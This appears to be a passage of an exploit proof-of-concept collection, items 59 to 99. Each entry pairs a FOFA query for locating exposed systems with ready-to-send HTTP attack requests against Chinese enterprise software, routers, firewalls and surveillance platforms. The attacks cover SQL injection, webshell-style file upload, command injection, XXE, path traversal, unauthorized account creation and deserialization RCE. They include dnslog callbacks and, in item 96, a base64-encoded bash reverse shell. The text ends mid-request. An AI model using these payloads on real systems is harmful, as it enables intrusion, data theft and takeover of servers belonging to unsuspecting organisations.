Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓Smart管理平台 importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then visit:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 confirm the vulnerability exists.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the file to write, the dir parameter gives the path it is written to, and the fileType parameter gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为流控路由器 remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it plants a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. tosei (Japan) self-service washing machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心 session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache-OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
    <params>
      <param>
      <value>
        <struct>
       <member>
          <name>test</name>
          <value>
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
          </value>
        </member>
      </struct>
      </value>
    </param>
    </params>
</methodCall>

Generate the payload with ysoserial
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast 盈可视 HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
